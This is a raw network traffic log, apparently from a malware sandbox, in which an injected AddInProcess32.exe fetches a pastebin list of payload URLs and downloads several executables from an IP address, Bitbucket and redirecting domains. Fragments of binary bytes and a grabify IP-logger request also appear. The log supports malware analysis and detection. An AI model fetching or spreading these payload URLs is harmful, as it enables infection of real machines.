2024-03-11 02:30:58 UTC | 50 | OUT | GET /raw/E0rY26ni HTTP/1.1
Host: pastebin.com
2024-03-11 02:30:59 UTC | 395 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:59 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 6
Last-Modified: Mon, 11 Mar 2024 02:30:53 GMT
Server: cloudflare
CF-RAY: 8628202aaf8109f1-LAS
2024-03-11 02:30:59 UTC | 800 | IN | Data Raw: 33 31 39 0d 0a 68 74 74 70 3a 2f 2f 31 38 35 2e 31 37 32 2e 31 32 38 2e 31 32 36 2f 49 6e 73 74 61 6c 6c 53 65 74 75 70 35 2e 65 78 65 0d 0a 68 74 74 70 73 3a 2f 2f 62 69 74 62 75 63 6b 65 74 2e 6f 72 67 2f 6a 2d 75 70 73 70 73 2f 6d 69 63 72 6f 73 6f 66 74 5f 6e 65 74 77 6f 72 6b 31 2f 64 6f 77 6e 6c 6f 61 64 73 2f 61 30 32 2e 65 78 65 0d 0a 68 74 74 70 73 3a 2f 2f 73 68 69 70 6f 66 64 65 73 74 69 6e 79 2e 63 6f 6d 2f 62 61 66 31 34 37 37 38 63 32 34 36 65 31 35 35 35 30 36 34 35 65 33 30 62 61 37 38 63 65 31 63 2e 65 78 65 0d 0a 68 74 74 70 73 3a 2f 2f 73 74 79 2e 69 6e 6b 2f 70 70 67 38 78 0d 0a 68 74 74 70 73 3a 2f 2f 6e 61 6d 65 6d 61 69 6c 2e 6f 72 67 2f 36 37 37 39 64 38 39 62 37 61 33 36 38 66 34 66 33 66 33 34 30 62 35 30 61 39 64 31 38 64 37 31
Data Ascii: 319
http://185.172.128.126/InstallSetup5.exe
https://bitbucket.org/j-upsps/microsoft_network1/downloads/a02.exe
https://shipofdestiny.com/baf14778c246e15550645e30ba78ce1c.exe
https://sty.ink/ppg8x
https://namemail.org/6779d89b7a368f4f3f340b50a9d18d71
2024-03-11 02:30:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 55605 | 104.192.141.1 | 443 | 44264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:58 UTC | 83 | OUT | GET /j-upsps/microsoft_network1/downloads/a02.exe HTTP/1.1
Host: bitbucket.org
2024-03-11 02:30:59 UTC | 4235 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                            server: envoy
                                                                                                                                                                                                                                                            x-usage-quota-remaining: 997837.069
                                                                                                                                                                                                                                                            vary: Accept-Language, Origin
                                                                                                                                                                                                                                                            x-usage-request-cost: 1090.77
                                                                                                                                                                                                                                                            cache-control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            x-b3-traceid: b9e31946e4f87466
                                                                                                                                                                                                                                                            x-usage-output-ops: 0
                                                                                                                                                                                                                                                            x-used-mesh: False
                                                                                                                                                                                                                                                            x-dc-location: Micros-3
                                                                                                                                                                                                                                                            content-security-policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org app.pendo.io; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ app.pendo.io cdn.pendo.io pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io data.pendo.io pendo-io-static.storage.googleapis.com pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; base-uri 'self'; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com 
fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net app.pendo.io data.pendo.io pendo-static-6266914010103808.storage.googleapis.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            x-usage-user-time: 0.031881
                                                                                                                                                                                                                                                            x-usage-system-time: 0.000842
                                                                                                                                                                                                                                                            location: https://bbuseruploads.s3.amazonaws.com/fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916
                                                                                                                                                                                                                                                            expires: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            x-served-by: ddcd3d4e054b
                                                                                                                                                                                                                                                            x-envoy-upstream-service-time: 68
                                                                                                                                                                                                                                                            content-language: en
                                                                                                                                                                                                                                                            x-view-name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                                                                                            x-b3-spanid: b9e31946e4f87466
                                                                                                                                                                                                                                                            x-static-version: 3c039d08312e
                                                                                                                                                                                                                                                            x-render-time: 0.055806875228881836
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            x-usage-input-ops: 0
                                                                                                                                                                                                                                                            x-version: 3c039d08312e
                                                                                                                                                                                                                                                            x-request-count: 3915
                                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                                                                                                                            Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 55621 | 104.21.63.71 | 443 | 44264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:59 UTC | 110 | OUT | GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: lawyerbuyer.org
2024-03-11 02:30:59 UTC | 680 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283792
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:53:03 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 3
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5axO7kCBZJTyNjcxcFJPBF5nrUJ7AneexTOuqaopuVC%2B8f9zenpn2Cc3zmgS%2BPlrNBIfAqsem2LRraUJZXh%2FNZRDpuHoUmwzRbRKTekp0qMjHZXNhzZbvYRI9un9FVpD2ts%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628202ecb9b09ed-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            Data Ascii: L$t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+U$3EESEEVWEe=Eu}h@ @=@h@S5@Ph@S
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 90 39 40 00 8b ff a0 39 40 00 a8 39 40 00 b4 39 40 00 c8 39 40 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 2c 3b 40 00 8b ff f7 d9 ff 24 8d dc 3a 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 30 3a 40 00 ff 24 8d 2c 3b 40 00 90 40 3a 40 00 64 3a 40 00 8c 3a 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 2c 3b 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02
                                                                                                                                                                                                                                                            Data Ascii: D$9@9@9@9@9@E^_E^_FGE^_IFGFGE^_t1|9u$r$,;@$:@Ir+$0:@$,;@@:@d:@:@F#Gr$,;@IF#GFG


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            46192.168.2.555606104.21.32.14244344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:59 UTC | 79 | OUT | GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: shipofdestiny.com
2024-03-11 02:30:59 UTC | 705 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CoQcpvm1gL5IlJSXjptvQNiZC%2Fd4iiS7L46c16j3Efx2OHJdcMT9GFH4jW0WqP3f%2BY3ieEU9dsOzf57FmbyFEgMMQFkg%2FCXPEA%2FAzpp%2BhfZwNUzF5G6NG3811OAqADg3Xyzp0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628202e5ad00ad7-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-03-11 02:30:59 UTC | 135 | IN | Data Raw: 38 31 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 61 77 79 65 72 62 75 79 65 72 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 62 61 66 31 34 37 37 38 63 32 34 36 65 31 35 35 35 30 36 34 35 65 33 30 62 61 37 38 63 65 31 63 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 81<a href="https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe">Temporary Redirect</a>.
2024-03-11 02:30:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            47192.168.2.555607172.67.177.13344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:59 UTC | 106 | OUT | GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: ittrade.org
2024-03-11 02:30:59 UTC | 686 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283768
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:52:57 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 3
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NpTbYJfRA2NQon%2BFm4%2FuyWnK5lYul7lwlUvm16Aox3R%2BU4hOYQMkF3einR5R1zFB%2FoSQeGkE5UXa%2FuywUIqGlqS%2Bzo8d3XPJrSXF2hgifyZ9xveGBZP%2B02Elmxe9Dw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628202f3ebe0ad9-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            48192.168.2.555623104.21.32.14244344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:59 UTC | 79 | OUT | GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: shipofdestiny.com
2024-03-11 02:30:59 UTC | 705 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KE8lvFeduCIN3ASFL86wXY4YMYXcblVTnN27pr9v7fvdAWpNGx%2BczWLVOL%2FGjPAmEFh2X8sFXjCFkzlwZ%2FYnvgq6%2FhfZahXzzROeG4QTcXtLJgloF6Orb%2Fx8BtHDB7XKzQrnlw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628202f48e109ff-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-03-11 02:30:59 UTC | 135 | IN
                                                                                                                                                                                                                                                            Data Ascii: 81<a href="https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe">Temporary Redirect</a>.
2024-03-11 02:30:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.5 | 55624 | 172.67.200.219 | 443 | 44264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:59 UTC | 38 | OUT | GET /ppg8x HTTP/1.1
                                                                                                                                                                                                                                                            Host: sty.ink
2024-03-11 02:31:00 UTC | 1188 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-cache, private
                                                                                                                                                                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6ImxwK2wvUXlySG43RXJ3N29UNzJBRkE9PSIsInZhbHVlIjoib1F4dTkraitXMXUyS0NKMFNKU2hSa3E0ZFdvU0dxZnFhdEZvRFh5TXhCRXdZczFpWTMvQmp2bVBkWHdKQzZSS1hDRU5WOFZLTW5pRmRuRnZEd2ZSOEI5dnpzeGpDa1hzSVgrR0gzR1U1R1BvOHUyOVpydmlqS25paCthN21wd0siLCJtYWMiOiJkOTA5NzVkMGQ1ZDM1MjYwM2RlNDU2MDAxYmE0NmE0NzVhNTY2M2M4ZjNkYjBmYjEyYzJjNzhmNjA5Mzc4OGU3IiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:59 GMT; Max-Age=7200; path=/; secure
                                                                                                                                                                                                                                                            set-cookie: shortiny_session=eyJpdiI6ImQ3QjlKZjd0aTUyTGprU3orV2tsb0E9PSIsInZhbHVlIjoiaStrdGpvT3lTNWZVdDB0U01TTkNLV0c4QzZZQkEvOTZ1djMvRjc4bG5ZYy9mU2lMdHcxQ3NxTzNtNE1tTGtEQ2xzS1pUcm1RV1BnVHcxZDJ1bGQ3SzJkQnE0TDNGSnJQbEEvL0tkNXZsM1p3OWt3UHNqM1lFQ1dvRmdrbFFkVWEiLCJtYWMiOiIzNmZlZDJhYjk4NjA2ZTQyYTVkODVkNWNmN2I5NGY4ZjQ5NzMwODNmMTJiYzQxNzZiYTg4ZTQwMDk4ZTA3ODNkIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:59 GMT; Max-Age=7200; path=/; httponly
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15768000
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
2024-03-11 02:31:00 UTC | 393 | IN
                                                                                                                                                                                                                                                            Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BEDmli%2B4FROZVSMXtG9C3LCVB7FaROwwEFFIZnSrhNcP5yFrun0c9qCKhQ6fzMSFHpa36W79%2Bi1ispxws6xrd7Hl0fk9qhlX%2F3EoQpLe06P1uH2YgKhD9P70"}],"group":"cf-nel","max_age":604800}NEL: {"succ
2024-03-11 02:31:00 UTC | 1369 | IN
                                                                                                                                                                                                                                                            Data Ascii: e1b<!DOCTYPE html><html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> ... CSRF Token --> <meta name="csrf-token" content="
2024-03-11 02:31:00 UTC | 1369 | IN
                                                                                                                                                                                                                                                            Data Ascii: <a href="https://shortiny.com" class="btn btn-primary">Go back</a> </div> </div> </div> </div></div> <footer id="footer" class="footer bg-base-0 d-print-none"> <div class="container
2024-03-11 02:31:00 UTC | 880 | IN
                                                                                                                                                                                                                                                            Data Ascii: </div> </div> </div> <div class="fixed-bottom pointer-events-none"> <div class="d-flex justify-content-center align-items-center"> <div class="border-0 mt-0 mr-3 mb-3 ml-3 p-2 rounded cookie-banner
2024-03-11 02:31:00 UTC | 6 | IN | Data Raw: 31 0d 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 1
2024-03-11 02:31:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.5 | 55617 | 172.67.168.159 | 443 | 44932 | C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:59 UTC | 502 | OUT | GET /1wxS HTTP/1.1
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            sec-fetch-dest: document
                                                                                                                                                                                                                                                            sec-fetch-mode: navigate
                                                                                                                                                                                                                                                            sec-fetch-site: none
                                                                                                                                                                                                                                                            sec-fetch-user: ?1
                                                                                                                                                                                                                                                            upgrade-insecure-requests: 1
                                                                                                                                                                                                                                                            Host: grabify.org
2024-03-11 02:31:00 UTC | 1036 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:00 GMT
                                                                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            set-cookie: 186352584766758=3; expires=Tue, 11-Mar-2025 02:31:00 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                                            set-cookie: jasgd1o47akuhs=154.16.105.38; expires=Tue, 11-Mar-2025 02:31:00 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                                            expires: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000; preload
                                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000; preload
                                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EZG89zNkWLCWhp0NEAe%2BM%2Fn1qyUbQwU3GzOenw4qfR4XK%2Bo5xgSkH0MaRKlL271eJgtAOxjpdy6q1SwfGGazSp9c%2FPwV9QWeK3BDZ2%2BZYKiQw49Wl09eY7pnn4cH6w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628202ebac209fb-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-03-11 02:31:00 UTC | 122 | IN
                                                                                                                                                                                                                                                            Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2024-03-11 02:31:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.5 | 55626 | 172.67.178.183 | 443 | 44264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:59 UTC | 74 | OUT | GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: namemail.org
2024-03-11 02:31:00 UTC | 687 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:00 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0X5CZ2y8209kwP8Cv90%2FPECV2myvymkHvQ%2Fu1q%2Fr3F0DVCltYBwCpJZfmFeX0V9NBNJtG2vViUSfx56jxyJFqircEEW40LpZ6Be7u2zERRIWvQp0fzN23TTS4bAGhFo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 862820317a6d0ad9-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-03-11 02:31:00 UTC | 131 | IN | Data Raw: 37 64 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 74 72 61 64 65 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 36 37 37 39 64 38 39 62 37 61 33 36 38 66 34 66 33 66 33 34 30 62 35 30 61 39 64 31 38 64 37 31 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
Data Ascii: 7d<a href="https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe">Temporary Redirect</a>.
2024-03-11 02:31:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.5 | 55622 | 104.192.141.1 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:59 UTC | 83 | OUT | GET /j-upsps/microsoft_network1/downloads/a02.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: bitbucket.org
2024-03-11 02:31:00 UTC | 4233 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                            server: envoy
                                                                                                                                                                                                                                                            x-usage-quota-remaining: 997169.559
                                                                                                                                                                                                                                                            vary: Accept-Language, Origin
